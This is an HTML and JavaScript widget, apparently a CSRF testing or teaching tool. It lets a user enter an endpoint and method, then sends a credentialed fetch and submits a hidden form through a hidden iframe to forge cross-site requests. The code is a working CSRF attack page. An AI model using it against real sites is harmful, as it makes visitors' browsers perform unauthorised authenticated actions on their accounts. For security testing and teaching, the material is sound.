<div class="form-container p-4 csrf-tool">
  <div class="text-center width-full">
    <label for="endpoint">Endpoint (make sure you include the protocol):</label>
    <input id="endpoint" type="text" class="width-full" />
  </div>
  <div class="pt-3">
    <label for="http-method">HTTP Method:</label>
    <select id="http-method">
      <option value="POST">POST</option>
      <option value="GET">GET</option>
      <option value="PUT">PUT(*not a "simple" request)</option>
      <option value="DELETE">DELETE(*not a "simple" request)</option>
    </select>
  </div>
  <button class="mt-3" id="forge-request">Forge Request!</button>
</div>

<script>
  /*
   * Check out these links to learn about "simple" requests
   * https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS#Preflighted_requests
   * https://developer.mozilla.org/en-US/docs/Web/HTML/Element/form#attr-method
   */
  const SIMPLE_REQUEST_METHODS = ["POST", "GET"];
  const forgeRequest = () => {
    const endpoint = document.getElementById("endpoint").value;
    const httpMethod = document.getElementById("http-method").value;
    fetch(endpoint, { method: httpMethod, credentials: "include" });
    if (SIMPLE_REQUEST_METHODS.includes(httpMethod)) {
      const iframe = document.createElement("iframe");
      iframe.hidden = true;
      iframe.setAttribute("name", "the-iframe");
      const form = document.createElement("form");
      form.setAttribute("action", endpoint);
      form.setAttribute("method", httpMethod);
      /* we set the target of the form to the iframe. this puts the "ouput" of
       * the form submit into the iframe and prevents the form from redirecting
       * to "endpoint"
       */
      form.setAttribute("target", "the-iframe");
      const body = document.getElementsByTagName("body")[0];
      body.appendChild(iframe);
      iframe.appendChild(form);
      form.submit();
    }
  };
  document
    .getElementById("forge-request")
    .addEventListener("click", forgeRequest);
</script>
